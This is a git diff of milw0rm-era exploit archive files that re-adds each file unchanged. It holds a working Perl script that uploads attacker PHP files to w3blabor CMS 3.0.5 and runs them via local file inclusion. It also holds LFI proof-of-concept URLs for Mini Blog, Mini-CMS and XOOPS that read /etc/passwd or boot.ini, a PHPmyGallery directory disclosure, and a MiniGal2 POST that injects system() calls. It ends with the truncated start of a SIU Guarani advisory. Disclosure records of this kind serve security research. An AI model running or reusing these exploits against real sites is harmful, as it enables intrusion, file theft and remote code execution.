+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7369.pl b/platforms/php/webapps/7369.pl
index 32561042c..9fe5dc40f 100755
--- a/platforms/php/webapps/7369.pl
+++ b/platforms/php/webapps/7369.pl
@@ -1,164 +1,164 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use HTTP::Request::Common qw(POST);
-use Getopt::Long;
-
-#                           \#'#/
-#                           (-.-)
-#    ------------------oOO---(_)---OOo-----------------
-#    |          __             __                     |
-#    |    _____/ /_____ ______/ /_  __  ______ ______ |
-#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
-#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
-#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
-#    | Security Research Division      /____/ 2oo8    |
-#    --------------------------------------------------
-#    |   w3blabor v3.0.5 Arbitrary File Upload & LFI  |
-#    --------------------------------------------------
-# [!] Discovered.: DNX
-# [!] Vendor.....: http://www.w3blaborcms.de
-# [!] Detected...: 17.10.2008
-# [!] Reported...: 29.11.2008
-# [!] Response...: xx.xx.2008
-#
-# [!] Background.: Sicher! Schnell! Einfach!
-#                  Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
-#                  abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
-#                  angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
-#                  Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
-#                  es zu etwas Besonderem!
-#
-# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
-#
-#                  71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
-#
-#                  80:          $dir = "../../includes/media";
-#                  81:          $file = $_FILES['datei']['name'];
-#
-#                  92:          $file = strtolower($file);
-#                  93:
-#                  94:          move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
-#                  95:          @chmod("".$dir.""/"".$file."", 0777);
-#
-# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
-#
-#                  45: $neueslogo = $_FILES['neueslogo']['name'];
-#                  46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
-#                  47:
-#                  48: $endung = substr ($_FILES['neueslogo']['name'], -3);
-#                  49:
-#                  50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
-#
-#                  54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
-#
-# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off)
-#
-#                  43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
-#                  44: 
-#                  45: if (file_exists($modulfile)) {
-#                  46:
-#                  47:         include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
-#
-# [!] Solution...: no update from vendor till now
-#
-
-if(!$ARGV[4])
-{
-  print "\n                        \\#'#/                    ";
-  print "\n                        (-.-)                     ";
-  print "\n   ----------------oOO---(_)---OOo----------------";
-  print "\n   | w3blabor v3.0.5 Arbitrary File Upload & LFI |";
-  print "\n   |                coded by DNX                 |";
-  print "\n   -----------------------------------------------";
-  print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>";
-  print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg";
-  print "\n[!] Targets:";
-  print "\n       -1              Upload over media.inc.php";
-  print "\n       -2              Upload over meinlogo.inc.php";
-  print "\n[!] Options:";
-  print "\n[!]    -f [filename]   Path to local file with php code";
-  print "\n       -p [ip:port]    Proxy support";
-  print "\n";
-  exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $file    = "";
-my %options = ();
-GetOptions(\%options, "1", "2", "f=s", "p=s");
-
-if($options{"f"})
-{
-  $file = $options{"f"};
-  if(!-e $file)
-  {
-    print "[!] Failed, local file doesn't exist.\n";
-    exit;
-  }
-}
-else
-{
-  print "[!] Failed, see usage.\n";
-  exit;
-}
-
-print "[!] Exploiting...\n";
-
-use_bug($host, $path, $file);
-
-print "[!] Exploit done\n";
-
-sub use_bug
-{
-  my $host = shift;
-  my $path = shift;
-  my $file = shift;
-  
-  my $ua       = LWP::UserAgent->new();
-  my $url      = "";
-  my $url2     = "";
-  my $req      = "";
-  $file        =~ /.*[\/|\\](.*)/;
-  my $filename = $1;
-  
-  if($options{"p"})
-  {
-    $ua->proxy('http', "http://".$options{"p"});
-  }
-  
-  if($options{"1"})
-  {
-    $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload';
-    $url2 = 'http://'.$host.$path.'includes/media/'.$filename;
-    $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ];
-  }
-  if($options{"2"})
-  {
-    if($file =~ m/.*\.jpg|peg|png|gif/i)
-    {
-      $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload';
-      $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
-      $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ];
-    }
-    else
-    {
-      print "[!] Failed, rename your local file to .jpg\n";
-      exit;
-    }
-  }
-  
-  $ua->request($req);
-  my $res = $ua->get($url2);
-  if($res->is_success)
-  {
-    print "[!] File uploaded\n";
-    print "[!] Check your file @ ".$url2."\n";
-  }
-  else
-  {
-    print "[!] Failed\n"; 
-  }  
-}
-
-# milw0rm.com [2008-12-07]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use HTTP::Request::Common qw(POST);
+use Getopt::Long;
+
+#                           \#'#/
+#                           (-.-)
+#    ------------------oOO---(_)---OOo-----------------
+#    |          __             __                     |
+#    |    _____/ /_____ ______/ /_  __  ______ ______ |
+#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
+#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
+#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
+#    | Security Research Division      /____/ 2oo8    |
+#    --------------------------------------------------
+#    |   w3blabor v3.0.5 Arbitrary File Upload & LFI  |
+#    --------------------------------------------------
+# [!] Discovered.: DNX
+# [!] Vendor.....: http://www.w3blaborcms.de
+# [!] Detected...: 17.10.2008
+# [!] Reported...: 29.11.2008
+# [!] Response...: xx.xx.2008
+#
+# [!] Background.: Sicher! Schnell! Einfach!
+#                  Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
+#                  abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
+#                  angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
+#                  Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
+#                  es zu etwas Besonderem!
+#
+# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
+#
+#                  71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
+#
+#                  80:          $dir = "../../includes/media";
+#                  81:          $file = $_FILES['datei']['name'];
+#
+#                  92:          $file = strtolower($file);
+#                  93:
+#                  94:          move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
+#                  95:          @chmod("".$dir.""/"".$file."", 0777);
+#
+# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
+#
+#                  45: $neueslogo = $_FILES['neueslogo']['name'];
+#                  46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
+#                  47:
+#                  48: $endung = substr ($_FILES['neueslogo']['name'], -3);
+#                  49:
+#                  50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
+#
+#                  54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
+#
+# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off)
+#
+#                  43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
+#                  44: 
+#                  45: if (file_exists($modulfile)) {
+#                  46:
+#                  47:         include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
+#
+# [!] Solution...: no update from vendor till now
+#
+
+if(!$ARGV[4])
+{
+  print "\n                        \\#'#/                    ";
+  print "\n                        (-.-)                     ";
+  print "\n   ----------------oOO---(_)---OOo----------------";
+  print "\n   | w3blabor v3.0.5 Arbitrary File Upload & LFI |";
+  print "\n   |                coded by DNX                 |";
+  print "\n   -----------------------------------------------";
+  print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>";
+  print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg";
+  print "\n[!] Targets:";
+  print "\n       -1              Upload over media.inc.php";
+  print "\n       -2              Upload over meinlogo.inc.php";
+  print "\n[!] Options:";
+  print "\n[!]    -f [filename]   Path to local file with php code";
+  print "\n       -p [ip:port]    Proxy support";
+  print "\n";
+  exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $file    = "";
+my %options = ();
+GetOptions(\%options, "1", "2", "f=s", "p=s");
+
+if($options{"f"})
+{
+  $file = $options{"f"};
+  if(!-e $file)
+  {
+    print "[!] Failed, local file doesn't exist.\n";
+    exit;
+  }
+}
+else
+{
+  print "[!] Failed, see usage.\n";
+  exit;
+}
+
+print "[!] Exploiting...\n";
+
+use_bug($host, $path, $file);
+
+print "[!] Exploit done\n";
+
+sub use_bug
+{
+  my $host = shift;
+  my $path = shift;
+  my $file = shift;
+  
+  my $ua       = LWP::UserAgent->new();
+  my $url      = "";
+  my $url2     = "";
+  my $req      = "";
+  $file        =~ /.*[\/|\\](.*)/;
+  my $filename = $1;
+  
+  if($options{"p"})
+  {
+    $ua->proxy('http', "http://".$options{"p"});
+  }
+  
+  if($options{"1"})
+  {
+    $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload';
+    $url2 = 'http://'.$host.$path.'includes/media/'.$filename;
+    $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ];
+  }
+  if($options{"2"})
+  {
+    if($file =~ m/.*\.jpg|peg|png|gif/i)
+    {
+      $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload';
+      $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
+      $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ];
+    }
+    else
+    {
+      print "[!] Failed, rename your local file to .jpg\n";
+      exit;
+    }
+  }
+  
+  $ua->request($req);
+  my $res = $ua->get($url2);
+  if($res->is_success)
+  {
+    print "[!] File uploaded\n";
+    print "[!] Check your file @ ".$url2."\n";
+  }
+  else
+  {
+    print "[!] Failed\n"; 
+  }  
+}
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7374.txt b/platforms/php/webapps/7374.txt
index ae597f9d7..bdbd9553c 100755
--- a/platforms/php/webapps/7374.txt
+++ b/platforms/php/webapps/7374.txt
@@ -1,47 +1,47 @@
-/*
-
-	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
-	
-	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
-	Discovered by cOndemned
-
-	Download : http://www.bpowerhouse.info/mini_blog.htm
-	
-	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*
-
-*/
-
-Source of index.php
-
-	[...]
-
-	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
-	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
-	
-	[...]
-	
-	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
-	78.		require("page/" . $page . ".php");
-	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
-	80.		require("admin/" . $admin . ".php");
-
-	[...]
-	
-
-Proof of Concept
-
-	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
-	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00
-	
-	for example request :
-	
-	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00
-	
-	...might give result like this :
-
-	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...
-	
-	
-EoF
-
-# milw0rm.com [2008-12-07]
+/*
+
+	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
+	
+	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
+	Discovered by cOndemned
+
+	Download : http://www.bpowerhouse.info/mini_blog.htm
+	
+	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*
+
+*/
+
+Source of index.php
+
+	[...]
+
+	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
+	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
+	
+	[...]
+	
+	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
+	78.		require("page/" . $page . ".php");
+	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
+	80.		require("admin/" . $admin . ".php");
+
+	[...]
+	
+
+Proof of Concept
+
+	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
+	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00
+	
+	for example request :
+	
+	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00
+	
+	...might give result like this :
+
+	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...
+	
+	
+EoF
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7375.txt b/platforms/php/webapps/7375.txt
index 90d4cfb39..5c69c46e2 100755
--- a/platforms/php/webapps/7375.txt
+++ b/platforms/php/webapps/7375.txt
@@ -1,43 +1,43 @@
-/*
-
-	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
-	
-	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
-	Discovered by cOndemned
-
-	Download : http://www.bpowerhouse.info/mini_cms.htm
-	
-	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*
-
-*/
-
-Source of index.php
-
-	[...]
-
-	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
-	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
-	
-	[...]
-	
-	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
-	81.		require("page/" . $page . ".php");
-	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
-	83.		require("admin/" . $admin . ".php");
-
-	[...]
-	
-
-Proof of Concept
-
-	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
-	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
-	
-
-It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... 
-Maybe double fail ? x]
-	
-	
-EoF
-
-# milw0rm.com [2008-12-07]
+/*
+
+	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
+	
+	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
+	Discovered by cOndemned
+
+	Download : http://www.bpowerhouse.info/mini_cms.htm
+	
+	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*
+
+*/
+
+Source of index.php
+
+	[...]
+
+	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
+	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
+	
+	[...]
+	
+	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
+	81.		require("page/" . $page . ".php");
+	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
+	83.		require("admin/" . $admin . ".php");
+
+	[...]
+	
+
+Proof of Concept
+
+	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
+	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
+	
+
+It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... 
+Maybe double fail ? x]
+	
+	
+EoF
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7377.txt b/platforms/php/webapps/7377.txt
index 802570b7d..19c151c9c 100755
--- a/platforms/php/webapps/7377.txt
+++ b/platforms/php/webapps/7377.txt
@@ -1,21 +1,21 @@
-            ############### Yee7.Com ###############
-             ############### zAx #################
-        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
- -----------------------------------------------------------------------------------------------------------
-
- [+] Script        : PHPmyGallery Gold 1.51
- [+] Vuln.          : Folders Disclosure
- [+] Download :http://phpmygallery.kapierich.net/en/downloads/
- [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
- [+] Team:  Electronic Security Team (Yee7.Com)
-
-Exploit : http://site/phpmygallery/index.php?group=../somefolder
-
- [+]Somefolder is any folder in the vulnerable website
- [+] ../ = Up from this folder
- [+] You can see all folders those are in "somefolder"
-
-
-[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]
-
-# milw0rm.com [2008-12-07]
+            ############### Yee7.Com ###############
+             ############### zAx #################
+        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
+ -----------------------------------------------------------------------------------------------------------
+
+ [+] Script        : PHPmyGallery Gold 1.51
+ [+] Vuln.          : Folders Disclosure
+ [+] Download :http://phpmygallery.kapierich.net/en/downloads/
+ [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
+ [+] Team:  Electronic Security Team (Yee7.Com)
+
+Exploit : http://site/phpmygallery/index.php?group=../somefolder
+
+ [+]Somefolder is any folder in the vulnerable website
+ [+] ../ = Up from this folder
+ [+] You can see all folders those are in "somefolder"
+
+
+[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]
+
+# milw0rm.com [2008-12-07]
diff --git a/platforms/php/webapps/7379.txt b/platforms/php/webapps/7379.txt
index 2fc6ce00f..6e6fae5ef 100755
--- a/platforms/php/webapps/7379.txt
+++ b/platforms/php/webapps/7379.txt
@@ -1,73 +1,73 @@
-<?php  
- /**********000000000000----------------------000\\\
-/*-00--------++++++++++++++++++_______________)_)_________
- -- --
-   -    MiniGal2(MG2) v0.5.1 remote Code Injection    |
-  ___     Z okazji urodzin ¿yczê sobie wszystkiego zajebistego
-                 Zawsze na odwrót lol    '''''_---"
-                    ___)()())0       ------------
-     \                  A-L           |    """"""
-      '--==9**        Victoria  heh      .
-------       gr:SID.PSYCHO ;> and rest and ALL
-       ---------++++++++++++=================))    
- ___ --             =======--
-            ./..................
-=======--////-
-    VULN:[includes\mg2_functions.php]
-    function writecomments($filename)  __LINE 555
-  ---------
-        function writecomments($filename) {
-	    $filename = "pictures/" . $filename;
-             unset($buffer);
-             if (count($this->comments) != 0) {
-             for ($i=0; $i < count($this->comments); $i++){
-             for ($j=0; $j < count($this->comments[$i]); $j++){
-              $buffer .= "*" . $this->comments[$i][$j];
-             }
-              $buffer .= "\n";
-             $fd = fopen($filename,"w+");
-              if (flock($fd, LOCK_EX)) { // do an exclusive lock
-              ftruncate($fd, 0);
-              fwrite($fd, $buffer);
-              flock($fd, LOCK_UN); // release the lock
-              fclose($fd);
-	        $this->log("Wrote comment to '$filename'");
-              } else {
-	        $this->log("ERROR: Could not lock commentfile '$filename' for writing");
-              echo "MG2 ERROR: Could not lock $filename (function 'writecomments')";
-             }
-            }
-         } else unlink($filename);
-     }
-         /\/\/\/\/\/\/\/\/\/\/\
-
-        function addcomment() {
-        $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
-        $_REQUEST['input'] = $this->charfix($_REQUEST['input']);
-        $_REQUEST['email'] = $this->charfix($_REQUEST['email']);
-        $_REQUEST['name'] = $this->charfix($_REQUEST['name']);
-        $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
-        $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
-        $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
-        if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
-         $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
-         $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
-         $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
-         $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
-         if (count($comment_exists) == 0) {
-           $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
-           $this->writecomments($_REQUEST['filename'] . ".comment");
-         .....etc //
-................-------------------------------------------=====================
-==== As you can se THE  input data is not enough filtered 
-      We can write self code in to the file 
-      by sending proper POSTS 
-      ex:
-      POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5
-      THE END
-     
--------*/
-// ALFONS LUJA just 4 fUn :P 
-?>
-
-# milw0rm.com [2008-12-08]
+<?php  
+ /**********000000000000----------------------000\\\
+/*-00--------++++++++++++++++++_______________)_)_________
+ -- --
+   -    MiniGal2(MG2) v0.5.1 remote Code Injection    |
+  ___     Z okazji urodzin ¿yczê sobie wszystkiego zajebistego
+                 Zawsze na odwrót lol    '''''_---"
+                    ___)()())0       ------------
+     \                  A-L           |    """"""
+      '--==9**        Victoria  heh      .
+------       gr:SID.PSYCHO ;> and rest and ALL
+       ---------++++++++++++=================))    
+ ___ --             =======--
+            ./..................
+=======--////-
+    VULN:[includes\mg2_functions.php]
+    function writecomments($filename)  __LINE 555
+  ---------
+        function writecomments($filename) {
+	    $filename = "pictures/" . $filename;
+             unset($buffer);
+             if (count($this->comments) != 0) {
+             for ($i=0; $i < count($this->comments); $i++){
+             for ($j=0; $j < count($this->comments[$i]); $j++){
+              $buffer .= "*" . $this->comments[$i][$j];
+             }
+              $buffer .= "\n";
+             $fd = fopen($filename,"w+");
+              if (flock($fd, LOCK_EX)) { // do an exclusive lock
+              ftruncate($fd, 0);
+              fwrite($fd, $buffer);
+              flock($fd, LOCK_UN); // release the lock
+              fclose($fd);
+	        $this->log("Wrote comment to '$filename'");
+              } else {
+	        $this->log("ERROR: Could not lock commentfile '$filename' for writing");
+              echo "MG2 ERROR: Could not lock $filename (function 'writecomments')";
+             }
+            }
+         } else unlink($filename);
+     }
+         /\/\/\/\/\/\/\/\/\/\/\
+
+        function addcomment() {
+        $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
+        $_REQUEST['input'] = $this->charfix($_REQUEST['input']);
+        $_REQUEST['email'] = $this->charfix($_REQUEST['email']);
+        $_REQUEST['name'] = $this->charfix($_REQUEST['name']);
+        $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
+        $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
+        $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
+        if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
+         $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
+         $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
+         $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
+         $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
+         if (count($comment_exists) == 0) {
+           $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
+           $this->writecomments($_REQUEST['filename'] . ".comment");
+         .....etc //
+................-------------------------------------------=====================
+==== As you can se THE  input data is not enough filtered 
+      We can write self code in to the file 
+      by sending proper POSTS 
+      ex:
+      POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5
+      THE END
+     
+-------*/
+// ALFONS LUJA just 4 fUn :P 
+?>
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7380.txt b/platforms/php/webapps/7380.txt
index 2df14f2f3..4cd0b8331 100755
--- a/platforms/php/webapps/7380.txt
+++ b/platforms/php/webapps/7380.txt
@@ -1,86 +1,86 @@
-Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-040
-
-
-Application:                    XOOPS   
-Versions Affected:              2.3.1
-Vendor URL:                     http://www.xoops.org/
-Bug:                            Multiple Local File Include
-Exploits:                       YES
-Reported:                       10.11.2008
-Vendor response:                10.11.2008
-Solution:                       YES
-Date of Public Advisory:        08.12.2008
-Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-XOOPS has Multiple Local File Include vulnerabilities.
-
-
-
-Details
-*******
-
-Local File Include vulnerability found in scripts:
-
-xoops_lib/modules/protector/blocks.php
-xoops_lib/modules/protector/main.php
-
-Successful exploitation requires that "register_globals" is enabled.
-
-Code
-----
-#################################################
-
-$mytrustdirname = basename( dirname( __FILE__ ) ) ;
-$mytrustdirpath = dirname( __FILE__ ) ;
-
-// language files
-$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
-if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
-        // user customized language file (already read by common.php)
-        // include_once "$mydirpath/language/$language/main.php" ;
-} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
-        // default language file
-        include_once "$mytrustdirpath/language/$language/main.php" ;
-...
-
-#################################################
-
-For successful exploitation first condition in if..else statement must be not true.
-
-Example:
-
-http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
-http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
-
-
-
-Solution
-********
-
-Vendor fixed this flaw on 26.11.2008. 
-
-XOOPS 2.3.2a Security Release can be download from Sourceforge repository:
-
-https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010
-
-Release notes:
-
-http://www.xoops.org/modules/news/article.php?storyid=4540
-
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact:    research [at] dsec [dot] ru
-            http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-12-08]
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-040
+
+
+Application:                    XOOPS   
+Versions Affected:              2.3.1
+Vendor URL:                     http://www.xoops.org/
+Bug:                            Multiple Local File Include
+Exploits:                       YES
+Reported:                       10.11.2008
+Vendor response:                10.11.2008
+Solution:                       YES
+Date of Public Advisory:        08.12.2008
+Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+XOOPS has Multiple Local File Include vulnerabilities.
+
+
+
+Details
+*******
+
+Local File Include vulnerability found in scripts:
+
+xoops_lib/modules/protector/blocks.php
+xoops_lib/modules/protector/main.php
+
+Successful exploitation requires that "register_globals" is enabled.
+
+Code
+----
+#################################################
+
+$mytrustdirname = basename( dirname( __FILE__ ) ) ;
+$mytrustdirpath = dirname( __FILE__ ) ;
+
+// language files
+$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
+if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
+        // user customized language file (already read by common.php)
+        // include_once "$mydirpath/language/$language/main.php" ;
+} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
+        // default language file
+        include_once "$mytrustdirpath/language/$language/main.php" ;
+...
+
+#################################################
+
+For successful exploitation first condition in if..else statement must be not true.
+
+Example:
+
+http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
+http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
+
+
+
+Solution
+********
+
+Vendor fixed this flaw on 26.11.2008. 
+
+XOOPS 2.3.2a Security Release can be download from Sourceforge repository:
+
+https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010
+
+Release notes:
+
+http://www.xoops.org/modules/news/article.php?storyid=4540
+
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact:    research [at] dsec [dot] ru
+            http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7381.txt b/platforms/php/webapps/7381.txt
index ad779d35b..032a5fcdd 100755
--- a/platforms/php/webapps/7381.txt
+++ b/platforms/php/webapps/7381.txt
@@ -1,212 +1,212 @@
-        #
-    #   #   #
-    ### # ##
-      #####             multiple remote vulnerabilities
-  ############              siu guarani
-     ######
-    ##  #  ##
-        #
-
-
-general information
--------------------
-bug type	: multiple remote vulnerabilities
-
-software name	: SIU Guarani
-
-vendor		: SIU (www.siu.edu.ar)
-
-authors		: proudhon & Ubik
-
